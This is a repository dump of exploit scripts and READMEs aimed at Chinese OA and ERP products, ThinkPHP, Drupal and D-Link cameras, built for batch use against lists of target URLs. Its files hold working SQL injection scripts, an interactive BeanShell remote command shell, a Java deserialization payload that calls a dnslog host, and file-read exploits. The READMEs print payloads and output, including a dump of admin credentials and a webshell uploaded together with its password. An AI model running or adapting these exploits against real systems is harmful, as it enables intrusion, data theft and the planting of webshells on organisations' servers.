├── D-Link_DCS系列监控 ├── url.txt ├── README.md ├── exp.py └── poc.py ├── README.md ├── 用友OA ├── 用友U8_OA_SQL注入 │ ├── url.txt │ ├── exp.py │ ├── README.md │ ├── getshell_exp.py │ ├── poc.py │ └── getshell_poc.py ├── 用友GRP-U8_SQL注入 │ ├── README.md │ ├── GRP-U8_SQLinjectioin_POC.py │ └── GRP-U8_SQLinjectioin_EXP.py ├── 用友ERP-NC_目录遍历 │ ├── README.md │ ├── exp.py │ └── poc.py └── 用友NC_反序列化RCE │ └── poc.py ├── 启莱OA └── 启莱OA_treelist.aspx_SQL注入 │ ├── url.txt │ ├── README.md │ ├── exp.py │ └── poc.py ├── 蓝凌OA └── 蓝凌OA_custom.jsp 任意文件读取漏洞 │ ├── url.txt │ ├── README.md │ ├── exp.py │ └── poc.py ├── 泛微OA ├── E-Cology_WorkflowServiceXml_RCE │ ├── url.txt │ ├── main │ │ ├── MacOS │ │ │ └── main │ │ ├── linux │ │ │ └── main │ │ ├── windows │ │ │ └── main.exe │ │ └── README.md │ └── README.md ├── e-cology-OA-SQL │ └── e-cology-OA-SQL.py ├── 泛微OA_V8_SQL注入 │ ├── README.md │ ├── weaverSQL_exp.py │ └── weaverSQL.py ├── ecology_test │ ├── ecology_rce.py │ ├── ecology_scan.py │ ├── Weaver-Ecology-OA_RCE-EXP.py │ ├── ecology_sql.py │ └── ecology_test.py ├── RCE │ └── e-cology-poc.py └── 泛微OA_V9_任意文件上传 │ ├── exp.py │ ├── 泛微OA_sql+upload.py │ └── poc.py ├── seeyon ├── 致远OA文件上传漏洞利用工具 │ ├── seeyon_exp_v2.jar │ └── README.md ├── 致远OA_Session泄露_任意文件上传漏洞 │ ├── README.md │ ├── exp.py │ └── poc.py ├── 致远OA组合getshell.py ├── 致远A8任意文件写入漏洞_getshell_exp │ └── 致远A8任意文件写入漏洞_getshell_exp.py └── seeyon_ajax_exp │ └── seeyon_upload_exp.py ├── ThinkAdmin ├── encode.php └── ThinkAdminScan.py ├── zentao-getshell ├── README.md └── exp.py ├── thinkphp5 ├── thinkphp5_rce │ ├── README.md │ └── tp5_rce.py ├── thinkphp5.0.x_RCE │ ├── README.md │ └── tp5-rce.py └── tp5-getshell │ ├── README.md │ └── tp5-getshell.py ├── tongdaOA ├── 前台任意用户登录 │ ├── README.md │ └── 通达OA前台任意用户登录漏洞.py └── 通达OA命令执行漏洞 │ └── tongda_rce.py ├── Drupal ├── CVE-2018-7600-Drupal7 │ ├── README.md │ └── CVE-2018-7600-Drupal7-EXP.py └── CVE-2019-6340 │ ├── CVE-2019-6340.py │ └── README.md ├── EYouMail ├── README.md └── EYouMailRCE.py ├── ThinkCMF ├── README.md └── ThinkCMF_getshell_exp.py ├── Jellyfin_任意文件读取漏洞 └── poc.py ├── 和信创天云桌面系统 ├── exp.py └── poc.py ├── 智慧校园管理系统 └── exp.py ├── 帆软OA ├── 帆软OA_V8_任意文件读取 │ └── poc.py └── 帆软OA_V9getshell │ └── poc.py ├── 亿赛通 └── 电子文档安全管理系统_dataimport_远程命令执行漏洞.py └── Redis-Getshell └── Redis-Getshell.py /D-Link_DCS系列监控/url.txt: -------------------------------------------------------------------------------- 1 | http://www.xxx.com 2 | xxx.xxx.xxx.xxx:8080 3 | www.xxx.com 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Exploit_Scripts 2 | Exploit_Scripts 3 | ## 自己修改的一些可以批量利用的EXP脚本,实时更新! 4 | -------------------------------------------------------------------------------- /用友OA/用友U8_OA_SQL注入/url.txt: -------------------------------------------------------------------------------- 1 | http://www.xxx.com 2 | xxx.xxx.xxx.xxx:8080 3 | www.xxx.com 4 | -------------------------------------------------------------------------------- /启莱OA/启莱OA_treelist.aspx_SQL注入/url.txt: -------------------------------------------------------------------------------- 1 | http://www.xxx.com 2 | xxx.xxx.xxx.xxx:8080 3 | www.xxx.com 4 | -------------------------------------------------------------------------------- /蓝凌OA/蓝凌OA_custom.jsp 任意文件读取漏洞/url.txt: -------------------------------------------------------------------------------- 1 | http://www.xxx.com 2 | xxx.xxx.xxx.xxx:8080 3 | www.xxx.com 4 | -------------------------------------------------------------------------------- /泛微OA/E-Cology_WorkflowServiceXml_RCE/url.txt: -------------------------------------------------------------------------------- 1 | http://www.xxx.com 2 | xxx.xxx.xxx.xxx:8080 3 | www.xxx.com 4 | -------------------------------------------------------------------------------- /seeyon/致远OA文件上传漏洞利用工具/seeyon_exp_v2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/H4ckTh3W0r1d/Exploit_Scripts/HEAD/seeyon/致远OA文件上传漏洞利用工具/seeyon_exp_v2.jar -------------------------------------------------------------------------------- /泛微OA/E-Cology_WorkflowServiceXml_RCE/main/MacOS/main: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/H4ckTh3W0r1d/Exploit_Scripts/HEAD/泛微OA/E-Cology_WorkflowServiceXml_RCE/main/MacOS/main -------------------------------------------------------------------------------- /泛微OA/E-Cology_WorkflowServiceXml_RCE/main/linux/main: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/H4ckTh3W0r1d/Exploit_Scripts/HEAD/泛微OA/E-Cology_WorkflowServiceXml_RCE/main/linux/main -------------------------------------------------------------------------------- /泛微OA/E-Cology_WorkflowServiceXml_RCE/main/windows/main.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/H4ckTh3W0r1d/Exploit_Scripts/HEAD/泛微OA/E-Cology_WorkflowServiceXml_RCE/main/windows/main.exe -------------------------------------------------------------------------------- /ThinkAdmin/encode.php: -------------------------------------------------------------------------------- 1 | 8 | -------------------------------------------------------------------------------- /zentao-getshell/README.md: -------------------------------------------------------------------------------- 1 | # zentao-getshell 禅道8.2 - 9.2.1前台Getshell 2 | ## Python Usage 3 | 4 | `python exp.py http://127.0.0.1:81/ jas502n.php` 5 | 6 | ![](./zentao.jpg) 7 | 8 | 9 | ![](./zentao.gif) 10 | 11 | -------------------------------------------------------------------------------- /thinkphp5/thinkphp5_rce/README.md: -------------------------------------------------------------------------------- 1 | # Introduction: 2 | 3 | 近日,thinkphp团队发布了版本更新,其中修复了一处远程代码执行漏洞,可直接getshell,影响范围:v5.x < 5.1.31,<= 5.0.23 4 | 5 | # Usage: 6 | 7 | python tp5_rce.py url 8 | 9 | # Screenshot: 10 | 11 | ![](./1.png) 12 | -------------------------------------------------------------------------------- /tongdaOA/前台任意用户登录/README.md: -------------------------------------------------------------------------------- 1 | # TongDaOA-Fake-User 2 | 通达OA 前台任意用户登录漏洞 3 | 4 | **仅供安全研究,禁止非法利用!** 5 | 6 | # 使用方法 7 | 1. python3 poc.py -v 版本 -url url 8 | 2. 运行并获取到可用的SESSIONID 9 | 3. 替换浏览器Cookie中的SESSIONID即可实现登录为admin 10 | 11 | # 影响范围 12 | 13 | **通达OA2017、V11.X 13 | 14 | 为了防止你们说我水,顺便丢一个单目标的EXP 15 | 16 | ##### 本脚本仅用于授权测试,请勿用于非法用途,请遵守游戏规则。 17 | -------------------------------------------------------------------------------- /EYouMail/README.md: -------------------------------------------------------------------------------- 1 | ## Usage: EYouMailRCE.py [OPTIONS] 2 | 3 | ### Options: 4 | -u, --url TEXT Target URL,对单一目标检测; Example:python3 EYouMailRCE.py -u 5 | https://ip:port 6 | 7 | -f, --file TEXT Target File,对批量目标检测; Example:python3 EYouMailRCE.py -f 8 | ip.txt 9 | 10 | -c, --cmd TEXT Target command,命令执行; Example: python3 EYouMailRCE.py -cmd 11 | id 12 | 13 | --help Show this message and exit. 14 | -------------------------------------------------------------------------------- /ThinkCMF/README.md: -------------------------------------------------------------------------------- 1 | # ThinkCMF_getshell 框架上的任意内容包含漏洞 2 | 3 | 远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。 4 | 5 | ## python usage: 6 | python3 ThinkCMF_getshell_exp.py -u http://127.0.0.1:1111 单个url测试 7 | 8 | python3 ThinkCMF_getshell_exp.py -f url.txt 批量检测 9 | 10 | ## 修复方法 11 | 将 12 | `HomebaseController.class.php` 和 `AdminbaseController.class.php` 类中 `display` 和 `fetch` 函数的修饰符改为 `protected` 13 | 14 | ## 免责声明 15 | 16 | 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。 17 | -------------------------------------------------------------------------------- /泛微OA/E-Cology_WorkflowServiceXml_RCE/main/README.md: -------------------------------------------------------------------------------- 1 | # 批量检测脚本 2 | 3 | ## windows 4 | ``` 5 | main.exe -h 6 | 使用说明: 7 | 执行命令:main.exe -u http://127.0.0.1:8080 -c whoami 8 | 批量检测:main.exe -l url.txt 9 | ``` 10 | ## linux 11 | ``` 12 | main -h 13 | 使用说明: 14 | 执行命令:./main -u http://127.0.0.1:8080 -c whoami 15 | 批量检测:./main -l url.txt 16 | ``` 17 | 18 | ## MacOS 19 | 20 | ``` 21 | main -h 22 | 使用说明: 23 | 执行命令:./main -u http://127.0.0.1:8080 -c whoami 24 | 批量检测:./main -l url.txt 25 | ``` 26 | -------------------------------------------------------------------------------- /thinkphp5/thinkphp5.0.x_RCE/README.md: -------------------------------------------------------------------------------- 1 | # thinkphp5.0.x_RCE 2 | thinkphp5远程代码执行两种版本的漏洞利用脚本 3 | 4 | 1.路由控制不严谨导致的RCE 5 | 6 | 影响版本:5.0.x<5.0.23 && 5.1.x<5.1.31 7 | 8 | payload:/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 9 | 10 | 2.Request中的变量覆盖导致RCE 11 | 12 | 13 | 影响版本:5.0.0~5.0.23 14 | 15 | payload:index.php?s=captcha 16 | 17 | (POST):_method=__construct&filter[]=system&method=get&get[]=whoami || _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami 18 | 19 | 20 | 参数: 21 | 22 | -h 帮助 23 | 24 | -u 指定URL进行检测 25 | 26 | -r 批量检测 27 | 28 | -t 设置线程 29 | 30 | --shell getshell 31 | 32 | example:python3 tp5-rce.py -u http://tp5.com 33 | -------------------------------------------------------------------------------- /泛微OA/e-cology-OA-SQL/e-cology-OA-SQL.py: -------------------------------------------------------------------------------- 1 | import requests,sys 2 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 3 | # 禁用安全请求警告 4 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 5 | 6 | def poc(url): 7 | url = url + '/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333' 8 | headers = { 'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"} 9 | payload = "formids=11111111111)))%0a%0dunion select NULL,value from v$parameter order by (((1" 10 | r = requests.post(url=url,data=payload,verify=False) 11 | #print(r.text) 12 | if "[]" in r.text: 13 | print("No vul") 14 | else: 15 | print("yep,you discover the vul") 16 | 17 | if __name__ == '__main__': 18 | url = sys.argv[1] 19 | poc(url) 20 | -------------------------------------------------------------------------------- /启莱OA/启莱OA_treelist.aspx_SQL注入/README.md: -------------------------------------------------------------------------------- 1 | # 启莱OA treelist.aspx SQL注入漏洞 2 | 3 | ## 使用方法 4 | 5 | ### 1.批量url检测 6 | 7 | url.txt格式如下: 8 | 9 | ``` 10 | http://www.xxx.com 11 | xxx.xxx.xxx.xxx:8080 12 | www.xxx.com 13 | ``` 14 | 15 | #### 漏洞验证脚本 16 | ``` 17 | python3 poc.py 18 | +------------------------------------------ 19 | + Version: 启莱OA treelist.aspx SQL注入漏洞 20 | + 使用格式: python3 poc.py 21 | + 文件名: url.txt 22 | +------------------------------------------ 23 | 请输入需要检测的文件名:url.txt 24 | ``` 25 | 26 | 27 | ### 2.单个url检测 28 | 29 | #### 漏洞验证脚本 30 | 31 | ``` 32 | python3 exp.py 33 | +------------------------------------------ 34 | + Version: 启莱OA treelist.aspx SQL注入漏洞 35 | + 使用格式: python3 exp.py 36 | + url地址: http://xxx.xxx.xxx.xxx 37 | +------------------------------------------ 38 | 请输入需要检测的url:http://xxx.xxx.xxx.xxx/ 39 | 请输入需要执行的sql语句:select db_name() 40 | [+]目标 http://xxx.xxx.xxx.xxx/ 存在SQL注入漏洞 41 | [+]响应为: ['xxxxxx'] 42 | ``` 43 | -------------------------------------------------------------------------------- /泛微OA/泛微OA_V8_SQL注入/README.md: -------------------------------------------------------------------------------- 1 | # 泛微OA_V8_SQL注入 2 | 3 | ## 使用方法 4 | 5 | ### 1.批量url检测 6 | 7 | url.txt格式如下: 8 | 9 | ``` 10 | http://www.xxx.com 11 | xxx.xxx.xxx.xxx:8080 12 | www.xxx.com 13 | ``` 14 | 15 | ``` 16 | python3 weaverSQL.py 17 | [-------------------------------------------------] 18 | [------------ 泛微OA V8 SQL注入 -----------] 19 | [-------- usage:python3 weaverSQL.py ------] 20 | [-------------------------------------------------] 21 | 请输入需要测试的文件名: url.txt 22 | ``` 23 | 24 | ### 2.单个url检测 25 | ``` 26 | python3 weaverSQL_exp.py 27 | [----------------------------------------- --------] 28 | [------------ 泛微OA V8 SQL注入 ---------------] 29 | [-------- usage:python3 weaverSQL_exp.py ------] 30 | [------------------------------------------- ------] 31 | 请输入需要测试url地址: http://www.xxx.com/ 32 | [+]目标系统: http://www.xxx.com/ 存在SQL注入! 33 | [+] 正在查询sysadmin密码信息....... 34 | [+]用户: sysadmin 密码MD5: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 35 | ``` 36 | -------------------------------------------------------------------------------- /D-Link_DCS系列监控/README.md: -------------------------------------------------------------------------------- 1 | # D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078 2 | 3 | ## 使用方法 4 | 5 | ### 1.批量url检测 6 | 7 | url.txt格式如下: 8 | 9 | ``` 10 | http://www.xxx.com 11 | xxx.xxx.xxx.xxx:8080 12 | www.xxx.com 13 | ``` 14 | 15 | #### 漏洞验证脚本 16 | ``` 17 | python3 poc.py 18 | +------------------------------------------ 19 | + Version: D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078 20 | + 使用格式: python3 poc.py 21 | + 文件名: url.txt 22 | +------------------------------------------ 23 | 请输入需要检测的文件名:url.txt 24 | ``` 25 | 26 | 27 | ### 2.单个url检测 28 | 29 | #### 漏洞验证脚本 30 | 31 | ``` 32 | python3 exp.py 33 | +------------------------------------------ 34 | + Title: D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078 35 | + 使用格式: python3 exp.py 36 | + Url: http://xxx.xxx.xxx.xxx 37 | +------------------------------------------ 38 | 请输入需要检测的url:https://xxx.xxx.xxx.xxx 39 | [+] 正在请求 https://xxx.xxx.xxx.xxx/config/getuser?index=0 40 | [+] 获取用户名密码: 41 | name=admin 42 | pass=xxxxxx 43 | ``` 44 | -------------------------------------------------------------------------------- /seeyon/致远OA_Session泄露_任意文件上传漏洞/README.md: -------------------------------------------------------------------------------- 1 | # 致远OA Session泄露 任意文件上传漏洞 2 | 3 | ## 使用方法 4 | 5 | ### 1.批量url检测 6 | 7 | url.txt格式如下: 8 | 9 | ``` 10 | http://www.xxx.com 11 | xxx.xxx.xxx.xxx:8080 12 | www.xxx.com 13 | ```` 14 | 15 | ``` 16 | python3 poc.py 17 | +--------------------------------------------------- 18 | + Version: 致远OA Session泄露 任意文件上传漏洞 19 | + 使用格式: python3 poc.py 20 | + 文件名: url.txt 21 | +--------------------------------------------------- 22 | 请输入需要检测的文件名:url.txt 23 | ``` 24 | 25 | ### 2.单个url检测 26 | ``` 27 | python3 exp.py 28 | +--------------------------------------------------- 29 | + Version: 致远OA Session泄露 任意文件上传漏洞 30 | + 使用格式: python3 poc.py 31 | + url: http://xxx.xxx.xxx.xxx 32 | +--------------------------------------------------- 33 | 请输入需要检测的url:http://xxx.xxx.xxx.xxx 34 | [+]目标 http://xxx.xxx.xxx.xxx解压文件成功.... 35 | [+]目标 http://xxx.xxx.xxx.xxx 被上传冰蝎木马: http://xxx.xxx.xxx.xxx/seeyon/common/designer/pageLayout/2RpOboI1.jsp 36 | [+]冰蝎密码: bxmm 37 | ``` 38 | -------------------------------------------------------------------------------- /泛微OA/E-Cology_WorkflowServiceXml_RCE/README.md: -------------------------------------------------------------------------------- 1 | # 泛微E-Cology WorkflowServiceXml RCE 2 | 3 | ## 使用方法 4 | 5 | ### 1.批量url检测 6 | 7 | url.txt格式如下: 8 | 9 | ``` 10 | http://www.xxx.com 11 | xxx.xxx.xxx.xxx:8080 12 | www.xxx.com 13 | ``` 14 | 15 | #### 漏洞验证脚本 16 | ``` 17 | python3 poc.py 18 | +------------------------------------------ 19 | + Version: 泛微E-Cology WorkflowServiceXml RCE 20 | + 使用格式: python3 poc.py 21 | + 文件名: url.txt 22 | +------------------------------------------ 23 | 请输入需要检测的文件名:url.txt 24 | ``` 25 | 26 | 27 | ### 2.单个url检测 28 | 29 | #### 漏洞验证脚本 30 | 31 | ``` 32 | python3 exp.py 33 | +------------------------------------------ 34 | + Version: 泛微E-Cology WorkflowServiceXml RCE 35 | + 使用格式: python3 exp.py 36 | + Url地址: http://xxx.xxx.xxx.xxx 37 | +------------------------------------------ 38 | 请输入需要检测的url:http://xxx.xxx.xxx.xxx 39 | 请输入需要执行的命令:whoami 40 | [+] 目标 http://xxx.xxx.xxx.xxx 存在RCE漏洞 41 | [+] 响应为: 42 | powered by potatso nt authority\system 43 | ``` 44 | -------------------------------------------------------------------------------- /蓝凌OA/蓝凌OA_custom.jsp 任意文件读取漏洞/README.md: -------------------------------------------------------------------------------- 1 | # 蓝凌OA_custom.jsp 任意文件读取漏洞 2 | 3 | ## 使用方法 4 | 5 | ### 1.批量url检测 6 | 7 | url.txt格式如下: 8 | 9 | ``` 10 | http://www.xxx.com 11 | xxx.xxx.xxx.xxx:8080 12 | www.xxx.com 13 | ``` 14 | 15 | #### 漏洞验证脚本 16 | ``` 17 | python3 poc.py 18 | +------------------------------------------ 19 | + Version: 蓝凌OA_custom.jsp 任意文件读取漏洞 20 | + 使用格式: python3 poc.py 21 | + 文件名: url.txt 22 | +------------------------------------------ 23 | 请输入需要检测的文件名:url.txt 24 | ``` 25 | 26 | 27 | ### 2.单个url检测 28 | 29 | #### 漏洞验证脚本 30 | 31 | ``` 32 | python3 exp.py 33 | +------------------------------------------ 34 | + Version: 蓝凌OA 任意文件读取漏洞 35 | + 使用格式: python3 exp.py 36 | + Url: http://xxx.xxx.xxx.xxx 37 | +------------------------------------------ 38 | 请输入需要检测的url:http://xxx.xxx.xxx.xxx 39 | 请输入需要读取的文件根路径+文件名(如:/etc/passwd):/etc/passwd 40 | [+] 正在请求 http://xxx.xxx.xxx.xxx/sys/ui/extend/varkind/custom.jsp 41 | [+] 成功读取/etc/passwd 42 | [+] 响应为: 43 | 44 | root:x:0:0:root:/root:/bin/bash 45 | ...... 46 | ``` 47 | -------------------------------------------------------------------------------- /用友OA/用友ERP-NC_目录遍历/README.md: -------------------------------------------------------------------------------- 1 | # 用友ERP-NC目录遍历及任意文件读取 2 | 3 | ## 漏洞简介 4 | 5 | 用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息 6 | 7 | ## 漏洞影响 8 | 9 | 用友ERP-NC 10 | 11 | ## POC 12 | 13 | ``` 14 | /NCFindWeb?service=IPreAlertConfigService&filename= 15 | /NCFindWeb?service=IPreAlertConfigService&filename=filename 16 | ``` 17 | 18 | ## 脚本使用 19 | 20 | ### 单个URL检测 21 | ``` 22 | Usage: exp.py [OPTIONS] 23 | 24 | Options: 25 | -u, --url TEXT 目标url 26 | -f, --filename TEXT 读取文件的名字 27 | --help Show this message and exit. 28 | ``` 29 | 30 | **目录遍历:** 31 | 32 | ```bash 33 | python3 exp.py --url http://127.0.0.1 34 | ``` 35 | 36 | **任意文件读取:** 37 | 38 | ```bash 39 | python3 exp.py --url http://127.0.0.1 --filename login.jsp 40 | ``` 41 | 42 | 读取文件内容时,可以通过先目录遍历获取文件路径,读取文件内容时,将文件路径传递给filename 参数 43 | 44 | ### 批量检测 45 | 46 | url.txt格式如下: 47 | 48 | ``` 49 | http://www.xxx.com 50 | xxx.xxx.xxx.xxx:8080 51 | www.xxx.com 52 | ``` 53 | 54 | ``` 55 | python3 poc.py 56 | +------------------------------------------ 57 | + Version: 用友ERP-NC 目录遍历漏洞 58 | + 使用格式: python3 poc.py 59 | + 文件名: url.txt 60 | +------------------------------------------ 61 | 请输入需要检测的文件名:url.txt 62 | ``` 63 | 结果会保存到success.txt文件中。 64 | -------------------------------------------------------------------------------- /用友OA/用友GRP-U8_SQL注入/GRP-U8_SQLinjectioin_POC.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | #coding:utf-8 3 | import re 4 | import requests 5 | import sys 6 | reload(sys) 7 | sys.setdefaultencoding('utf-8') 8 | if len(sys.argv) != 3: 9 | print "Usage: python poc.py url sql" 10 | sys.exit(1) 11 | url = sys.argv[1] 12 | sql = sys.argv[2] 13 | headers = { 14 | "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36", 15 | "Content-Type":"application/x-www-form-urlencoded", 16 | } 17 | def poc(url,sql): 18 | url = url + '/Proxy' 19 | print url 20 | data = 'cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataData'+sql+'' 21 | res = requests.post(url,headers=headers,data=data) 22 | res = res.text 23 | result_row = r'' 21 | res = requests.post(url,headers=headers,data=data) 22 | res = res.text 23 | result_row = r'' 24 | ROW = re.findall(result_row,res,re.S | re.M) 25 | print '命令执行成功!' 26 | for i in range(len(ROW)): 27 | print ROW[i] 28 | if __name__ == "__main__": 29 | exp(sys.argv[1],sys.argv[2]) 30 | -------------------------------------------------------------------------------- /泛微OA/ecology_test/ecology_rce.py: -------------------------------------------------------------------------------- 1 | import urllib3 2 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 3 | import requests, sys 4 | 5 | print ''' 6 | -------------------------------------- 7 | BeanShell test script by LuckyEast >_< 8 | -------------------------------------- 9 | ''' 10 | 11 | headers = { 12 | 'Content-Type': 'text/xml; charset=utf-8', 13 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0', 15 | 'Cache-Control': 'max-age=0', 16 | 'Content-Type': 'application/x-www-form-urlencoded', 17 | 'Upgrade-Insecure-Requests': '1', 18 | 'Content-Length': '578' 19 | } 20 | 21 | url = '/weaver/bsh.servlet.BshServlet' 22 | 23 | 24 | def test(target): 25 | while 1: 26 | 27 | cmd = raw_input('\n>>>Command= ') 28 | if cmd == 'exit': 29 | break 30 | else: 31 | test_url = target + url 32 | poc = 'bsh.script=\u0065\u0078\u0065\u0063("cmd.exe /c %s");&bsh.servlet.output=raw'% cmd 33 | rsp = requests.post(url=test_url, data=poc, headers=headers, verify=False, timeout=5) 34 | text = rsp.text 35 | print text 36 | 37 | if __name__ == "__main__": 38 | target = sys.argv[1] 39 | test(target) 40 | -------------------------------------------------------------------------------- /用友OA/用友ERP-NC_目录遍历/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import click 3 | import urllib3 4 | import click 5 | 6 | 7 | requests.packages.urllib3.disable_warnings() 8 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 9 | 10 | 11 | def info(): 12 | print('+------------------------------------------') 13 | print('+ \033[34mVersion: 用友ERP-NC目录遍历 \033[0m') 14 | print('+ \033[36m使用格式: python3 exp.py --help \033[0m') 15 | print('+------------------------------------------') 16 | 17 | 18 | def scan(url): 19 | uri = "/NCFindWeb?service=IPreAlertConfigService&filename=" 20 | targeturl = url + uri 21 | rep = requests.get(targeturl) 22 | print(rep.text) 23 | 24 | def readfile(url, filename): 25 | uri = "/NCFindWeb?service=IPreAlertConfigService&filename=" + filename 26 | targeturl = url + uri 27 | rep = requests.get(targeturl) 28 | print(rep.text) 29 | 30 | 31 | @click.command() 32 | @click.option("-u", "--url", help='目标url') 33 | @click.option("-f", "--filename", help="读取文件的名字") 34 | def main(url, filename): 35 | info() 36 | if url != None and filename == None: 37 | scan(str(url)) 38 | elif url != None and filename != None: 39 | readfile(str(url), filename) 40 | else: 41 | print("python3 exp.py --help") 42 | 43 | if __name__ == '__main__': 44 | main() 45 | -------------------------------------------------------------------------------- /用友OA/用友NC_反序列化RCE/poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import threadpool 3 | import urllib3 4 | import sys 5 | import base64 6 | ip = "" 7 | dnslog = "\x6e\x6b\x6e\x69\x69\x6b\x2e\x63\x65\x79\x65\x2e\x69\x6f" #dnslog把字符串转16进制替换该段,测试用的ceye.io可以回显 8 | data = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x03\x4c\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x03\x4c\x00\x08\x70\x72\x6f\x74\x6f\x63\x6f\x6c\x71\x00\x7e\x00\x03\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x03\x78\x70\xff\xff\xff\xff\x00\x00\x00\x50\x74\x00\x11"+dnslog+"\x3a\x38\x30\x74\x00\x00\x74\x00\x0e"+dnslog+"\x74\x00\x04\x68\x74\x74\x70\x70\x78\x74\x00\x18\x68\x74\x74\x70\x3a\x2f\x2f"+dnslog+"\x3a\x38\x30\x78" 9 | uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"} 10 | req = requests.post("http://"+ip+"/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25) 11 | print (req.text) 12 | -------------------------------------------------------------------------------- /用友OA/用友U8_OA_SQL注入/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 6 | 7 | def title(): 8 | print('+------------------------------------------') 9 | print('+ \033[34mVersion: 用友 U8 OA test.jsp SQL注入漏洞 \033[0m') 10 | print('+ \033[36m使用格式: python3 exp.py \033[0m') 11 | print('+ \033[36murl地址: http://xxx.xxx.xxx.xxx \033[0m') 12 | print('+------------------------------------------') 13 | 14 | def POC_1(target_url): 15 | vuln_url = target_url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))" 16 | headers = { 17 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 18 | } 19 | try: 20 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 21 | response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) 22 | if "c4ca4238a0b923820dcc509a6f75849b" in response.text and response.status_code == 200: 23 | print("\033[32m[+]目标 {} 存在漏洞 \n[+] 响应地址: {} \033[0m".format(target_url, vuln_url)) 24 | else: 25 | print("\033[31m[x]目标 {} 不存在漏洞 \033[0m".format(target_url)) 26 | except Exception as e: 27 | print("\033[31m[x]目标 {} 请求失败 \033[0m".format(target_url)) 28 | 29 | if __name__ == '__main__': 30 | title() 31 | target_url = str(input("\033[35m请输入需要检测的url:\033[0m")) 32 | POC_1(target_url) 33 | -------------------------------------------------------------------------------- /用友OA/用友U8_OA_SQL注入/README.md: -------------------------------------------------------------------------------- 1 | # 用友 U8 OA test.jsp SQL注入漏洞 2 | 3 | ## 使用方法 4 | 5 | ### 1.批量url检测 6 | 7 | url.txt格式如下: 8 | 9 | ``` 10 | http://www.xxx.com 11 | xxx.xxx.xxx.xxx:8080 12 | www.xxx.com 13 | ``` 14 | 15 | #### 漏洞验证脚本 16 | ``` 17 | python3 poc.py 18 | +------------------------------------------ 19 | + Version: 用友 U8 OA test.jsp SQL注入漏洞 20 | + 使用格式: python3 poc.py 21 | + 文件名: url.txt 22 | +------------------------------------------ 23 | 请输入需要检测的文件名:url.txt 24 | ``` 25 | 26 | #### 漏洞利用(getshell)脚本 27 | 28 | ``` 29 | python3 getshell_poc.py 30 | +------------------------------------------ 31 | + Version: 用友 U8 OA test.jsp SQL注入漏洞 32 | + 使用格式: python3 getshell_poc.py 33 | + 文件名: url.txt 34 | +------------------------------------------ 35 | 请输入需要检测的文件名:url.txt 36 | ``` 37 | 38 | ### 2.单个url检测 39 | 40 | #### 漏洞验证脚本 41 | 42 | ``` 43 | python3 exp.py 44 | +------------------------------------------ 45 | + Version: 用友 U8 OA test.jsp SQL注入漏洞 46 | + 使用格式: python3 exp.py 47 | + url地址: http://xxx.xxx.xxx.xxx 48 | +------------------------------------------ 49 | 